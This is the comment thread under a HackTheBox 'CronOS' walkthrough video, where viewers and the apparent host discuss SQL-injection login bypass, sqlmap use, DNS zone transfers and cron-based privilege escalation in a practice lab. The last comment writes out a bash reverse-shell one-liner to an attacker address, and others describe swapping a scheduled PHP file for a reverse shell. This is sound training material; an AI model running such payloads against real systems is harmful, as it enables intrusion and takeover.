HackTheBox - CronOS

  • Published on 28 Sep 2024

Comments • 113

  • @KarlWakimLeb
    @KarlWakimLeb 6 years ago +27

    Also, just a tip, proxy sqlmap through burp, so when it gets the redirect you can look at the last request in HTTP history and thus find the particular input that was successful.

    • @hassanabdul-kareem2287
      @hassanabdul-kareem2287 5 years ago +8

      You could also do sqlmap -vvvv
      this way you see the sent request and the received response, too.

  • @damiancampbell1743
    @damiancampbell1743 3 years ago +4

    You know, sometimes it's the little things, like learning that "cd -" allows you to go to your previous directory, that make me happy.

    • @SuperSohaizai
      @SuperSohaizai 3 years ago

      .. works too btw, as in dot dot (maybe not on mac, im not sure)

    • @EhtishamSec
      @EhtishamSec 3 years ago +2

      Ctrl+ a to go back to first char of line

  • @tigermelissa
    @tigermelissa 5 years ago +27

    I'm so impressed with how you did the priv esc...I just used pspy, saw that it was running php /var/www/laravel/artisan and edited artisan to be a php reverse shell

    • @dabson1884
      @dabson1884 4 years ago +10

      I did the same thing as you haha and decided to watch anyway and love how in depth he got with it.

    • @musclefreak92
      @musclefreak92 4 years ago +10

      I just directly copied the root.txt file to /tmp and changed the permission to read it xD

    • @quirkykirkplays
      @quirkykirkplays 2 years ago +1

      That was my first instinct as well lol

    • @superninja8806
      @superninja8806 1 year ago

      Same

  • @hamzakhiate1767
    @hamzakhiate1767 6 years ago +11

    Man! I'm a junior pentester and I did learn a lot from you, thank you

    • @AUBCodeII
      @AUBCodeII 7 months ago

      Are you senior now?

    • @hamzakhiate1767
      @hamzakhiate1767 6 months ago +2

      @SmartySmarter
      0 seconds ago
      Yes I’m 😂 I manage a team of Pentesters and work on helping developers understand and fix vulnerability which is the hardest part.

    • @AUBCodeII
      @AUBCodeII 6 months ago

      @@hamzakhiate1767 awesome! Congrats, man!

  • @Robert-pl8jp
    @Robert-pl8jp 5 years ago +10

    Wasn't the C shell a bit excessive, rather than just sending over nc, or using some other reverse oneliner?

  • @marcobrandoni8433
    @marcobrandoni8433 6 years ago

    Thank you Ippsec. Today I have learned a lot from this machine. Keep up the good work

  • @Clutchisback1PC
    @Clutchisback1PC 6 years ago +5

    why not have the scheduled task execute a reverse shell back? Wouldn't that have given you root?

    • @ippsec
      @ippsec 6 years ago +31

      Just to avoid using the same technique constantly.

    • @Clutchisback1PC
      @Clutchisback1PC 6 years ago +12

      IppSec well that is much appreciated! Wanted to make sure I was on the right track myself....
      I just learned how to enable tab complete from you and I can tell you your little "by the way" tips like that are priceless

  • @dotter5380
    @dotter5380 7 years ago +2

    Ippsec, what terminal layout/tools are you using to switch between different terminal tabs? Btw, great videos / walkthroughs you are making.

    • @ippsec
      @ippsec 7 years ago +4

      It is tmux -- I believe I talk about it in the first HTB video

  • @_gipi
    @_gipi 6 years ago

    It's not a big deal, but if you want to wait for the minute to pass you can use the command *watch(1)*, which executes a program periodically, showing its output fullscreen.

  • @boonjintok1690
    @boonjintok1690 3 years ago

    Hi, does anyone understand the DNS part he is doing? What is the purpose of running nslookup and dig axfr?

  • @behnamanisi1
    @behnamanisi1 4 years ago

    My sqlmap failed even though I was following the exact output of Burp, any idea why guys?

  • @krzysiekhc6728
    @krzysiekhc6728 7 years ago

    @IppSec in my opinion, the better idea of sending a reverse shell is just simply backpipe ^_^

    • @ippsec
      @ippsec 7 years ago +1

      Essentially what mkfifo is doing -- It's not my first option in CTF's because anyone can read or direct content into the files. So it's quite easy to get trolled in CTF's when depending on a file for your reverse shell.

    • @krzysiekhc6728
      @krzysiekhc6728 7 years ago

      That's true, but I chose backpipe because it is a built-in thing XD

  • @cesarisaac2055
    @cesarisaac2055 3 years ago

    machine

  • @Hitmonkey420
    @Hitmonkey420 1 year ago

    I’m having issues with compiling the C script. It can’t execute on Cron, with the error “/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found”; the glibc version on Cron is 2.23. I’m not good with C at all, does anyone have a solution for installing an older version to make it compile correctly? Can you use update-alternatives like with Python versions?

    • @lumenknotty6355
      @lumenknotty6355 1 year ago

      I'm late but I got it to work by modifying artisan with a rev shell.

  • @connorsheehan4598
    @connorsheehan4598 1 year ago

    Who makes the boxes?

  • @zenziiiiiiiiii
    @zenziiiiiiiiii 4 years ago

    @IppSec you are awesome!

  • @hatemmohamed4032
    @hatemmohamed4032 7 years ago

    Please continue to solve more machines!

  • @theone3428
    @theone3428 5 years ago

    Can someone explain to me why he needed to create the C program??

  • @neoXXquick
    @neoXXquick 7 years ago

    really nice..

  • @ajnikurtaj2782
    @ajnikurtaj2782 4 years ago

    I am having a very hard time editing files within a meterpreter session. Can somebody give me a tip?

    • @il2626
      @il2626 4 years ago +2

      nano screws up everything and you have to use " stty raw -echo "

  • @gopikrishnac5958
    @gopikrishnac5958 7 years ago

    what about Granny

    • @ippsec
      @ippsec 7 years ago +1

      Plan on doing that one when another gets retired, and combine videos.

  • @dawnsix
    @dawnsix 3 years ago +7

    I can't explain how amazing your videos are... you literally answer questions as I'm asking them in my head

  • @santoshbhandari1310
    @santoshbhandari1310 4 years ago +5

    I did not think of doing a SQLi. Instead I fuzzed for files in admin.cronos.htb/ with .php extensions and found welcome.php, which was a 302. I replayed the request in Burp and found that it yields an HTML body containing the form. I simply issued a POST request to /welcome.php with post data 'command', which worked well. That 'command' parameter can be read from the HTML output. The requests are completely unauthenticated. Maybe something the box creator missed. BTW I enjoyed your video!

    • @SuperRishabh16
      @SuperRishabh16 4 years ago

      that's something interesting

    • @xB-yg2iw
      @xB-yg2iw 3 years ago

      That's really cool, nice find!

  • @Haxr-dq6wt
    @Haxr-dq6wt 4 years ago +4

    Thank you IppSec
    will you ever do a course only on privilege escalation?

  • @abdullahal-nahdi9421
    @abdullahal-nahdi9421 2 years ago +3

    Back in the day the medium machines were quite easy; now the easy machines are double the difficulty

  • @fingerprrrrint
    @fingerprrrrint 3 years ago +2

    Your post Exploitation is art

  • @j.stan8916
    @j.stan8916 4 years ago +2

    Amazing. Thanks for the alternative method. I got the root using the reverse nc but that's just too mainstream. Btw for anybody having trouble getting that tty to spawn (since for me it did not want to spawn using like 10 methods) - remember there is always vi which can be used for that as well.

  • @canadianmistwhiskey
    @canadianmistwhiskey 8 months ago

    That sqlmap method of just giving it the request...beautiful

  • @calaydd
    @calaydd a month ago

    Can someone explain to me why running 'cat /etc/passwd > test.txt' doesn't work, but we can run commands like chmod/touch/mkdir? Also, did anyone get a reverse shell from Kernel.php and not artisan?

  • @westernvibes1267
    @westernvibes1267 4 years ago

    When it redirects me to out of scope urls.
    Me *shit it's an original page i can't attack it*
    Ippsec *I dOnT wAnT tO aTTaCk tHis sIte baCK oFF*

  • @picclfeicar7705
    @picclfeicar7705 5 years ago +3

    I don't understand the whole DNS part. Do you have any resource that clarifies that?

    • @TsukiCTF
      @TsukiCTF 5 years ago +12

      Whenever you come across 53/open TCP port, you may want to test for zone transfer (command: dig axfr @ ) because it may leak domains/subdomains which could potentially lead you to completely different websites due to virtual host routing.

  • @4Mevo
    @4Mevo 7 years ago +2

    Hey, thanks for uploading another walkthrough! I love how you also include the times things don't go as intended. There was one thing I was kind of confused about, however. Why were you able to log in to the admin panel after running SQLMap? What did it do?

    • @ippsec
      @ippsec 7 years ago +21

      The SQL Query for login is probably similar to:
      > Select * from login where username = '$username' and password = '$password';
      I changed the query to:
      > Select * from login where username = '$username'-- -' and password = 'doesnotmatter'
      So ' -- - will close out the quote, then insert a comment so the rest of the query is ignored.
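The query shape ippsec sketches in the reply above, as an added Python example (not code from the video, the box, or the Laravel app): a login check that interpolates the submitted username into SQL, beside the parameterized form that treats the same input as data. The login table, its single row and the use of SQLite are constructed stand-ins so the block runs offline; note that SQLite accepts "--" as a comment opener with or without a following space, whereas MySQL requires whitespace after "--", which is what the trailing "-" in the payload guarantees.

```python
import sqlite3

# Constructed stand-in for the login table the reply describes (not the box's
# real schema or credentials). SQLite is used so the example runs offline.
SAMPLE_USERS = [("admin", "correct horse battery staple")]


def make_db():
    """Builds an in-memory database holding the constructed login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def render_vulnerable_query(username, password):
    """Returns the SQL text a string-interpolating login builds, so the effect
    of a quote-and-comment input can be read off directly."""
    return (f"SELECT * FROM login WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn, username, password):
    """The flawed pattern: user input becomes part of the SQL syntax.
    A username of  admin'-- -  closes the quote and comments out the
    password check, so the row is returned regardless of the password."""
    row = conn.execute(render_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    """The fix: bound parameters. The driver sends the values separately from
    the statement, so a quote or '--' in the input can never alter the query."""
    row = conn.execute(
        "SELECT * FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    bypass = "admin'-- -"
    print(render_vulnerable_query(bypass, "doesnotmatter"))
    print("vulnerable   :", login_vulnerable(conn, bypass, "doesnotmatter"))
    print("parameterized:", login_parameterized(conn, bypass, "doesnotmatter"))
```

Running the block prints the rendered query, then True for the interpolating version and False for the parameterized one with the same input; the parameterized version still returns True only for the real username and password pair.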

  • @dom252
    @dom252 6 years ago +1

    Are there any issues using Burp Pro across multiple Kali VMs, with a single user license?

  • @hassanabdul-kareem2287
    @hassanabdul-kareem2287 5 years ago

    I just did the box and finished it and then watched your video.
    why didn't you just edit the artisan file? It's owned by www-data and you have permissions to edit it. Just replacing it with a php reverse shell would have done the trick.
    Also, you can do nmap -vvvv [...] so you'd see the sent requests/received responses too, frankly enough even the payload is given in clear text there.
    Finally, thank you for your video.

  • @getoutandgrill
    @getoutandgrill 7 years ago +5

    What was the hot key in Burp you used to URL encode the string?

    • @getoutandgrill
      @getoutandgrill 7 years ago +2

      I think it is CTRL U. He mentioned it in the video.

    • @7Shol
      @7Shol 4 years ago

      Why is it necessary to percent-encode the password?

  • @strannyisyn
    @strannyisyn 6 years ago +1

    Hey IppSec. How did you edit the Kernel.php file? On the VM, it doesn't appear to be world writeable. The only permissions on it are for root. Thanks!

    • @ippsec
      @ippsec 6 years ago +2

      Revert the machine. It should be world-writeable, perhaps you have the wrong file. The one i edit is in /var/www/laravel/app/Console

    • @strannyisyn
      @strannyisyn 6 years ago +1

      I actually figured it out just after asking. Apparently nano is really fussy when in a remote shell. I tried it with vi and it worked. Thanks for the video and assistance!

    • @i_m_in_love_with_sanatan
      @i_m_in_love_with_sanatan 5 years ago

      @@ippsec not able to edit the file Kernel.php, vim or vi is not going into insert mode

    • @i_m_in_love_with_sanatan
      @i_m_in_love_with_sanatan 5 years ago

      @@ippsec stty raw -echo gives strange output behaviour, the up/down/right/left keys give some different output

  • @viv_2489
    @viv_2489 3 years ago

    Thanks for these videos... You are a master of your craft

  • @paired7815
    @paired7815 5 years ago

    thanks... learning a lot from you

  • @anthonyholderbaum6956
    @anthonyholderbaum6956 4 years ago

    Well done, thanks!

  • @camenal
    @camenal 7 years ago

    Do you know where I can download the same version of this Torrent app? Thanks

  • @KarlWakimLeb
    @KarlWakimLeb 6 years ago

    Is there a particular reason for manually copying the request and saving it for sqlmap? Right-click + save to file seems to work fine... But only works if "base 64 encode" is checked in the save to file dialog box.

    • @ippsec
      @ippsec 6 years ago +3

      Mainly just didn’t want to show my filesystem as I wasn’t sure if I kept it spoiler free

  • @GeekyGizmo007
    @GeekyGizmo007 5 years ago

    You use dirbuster in this case but I've seen you use gobuster in other cases. Is there a reason why you didn't use gobuster this time?

    • @thetoekneesan
      @thetoekneesan 1 year ago

      he said he likes to switch it up as relying on only one tool isn't a good practice

  • @rouhani133
    @rouhani133 2 years ago

    Thanks for the video. How did you notice that we need to add an extra - to the following: admin' -- ? This part was not quite clear, as it is quite hard to depend on guessing. Thanks again

    • @ippsec
      @ippsec 2 years ago +2

      An SQL comment is -, the last - is just there so I can see the space

    • @rouhani133
      @rouhani133 2 years ago

      @@ippsec awesome, thanks a lot IppSec. You are d Best Buddy

  • @sherlock5969
    @sherlock5969 2 years ago

    Thanks for the video. One quick question: on what basis did you decide to encode at 11:57?

    • @ippsec
      @ippsec 2 years ago

      Decode the cookie you mean? I just saw it was encoded so I wanted to decode it

    • @sherlock5969
      @sherlock5969 2 years ago

      @@ippsec not the cookie, the encoding of that command value part.

  • @Samwisedragon
    @Samwisedragon 3 years ago

    What keystroke combination did he use to bring the shell to the foreground at 12:28?

  • @TheDrake1991
    @TheDrake1991 7 years ago

    Excuse me, but can I ask you some questions about other machines?

    • @ippsec
      @ippsec 7 years ago

      The NetSecFocus Slack is the best place for that, I prefer to keep comments here spoiler free. Just be sure to keep any discussion about machines to Direct Messages. If you ask someone to ping you about a machine, normally you'll get a response.

    • @TheDrake1991
      @TheDrake1991 7 years ago

      Thanks, are you on Slack too? I can't find you on it.

  • @wheeler90
    @wheeler90 4 years ago

    #!/bin/bash
    bash -i >& /dev/tcp/10.10.14.*/9002 0>&1
    That's the best hint I will give anyone that's looking to do this as of 10/2019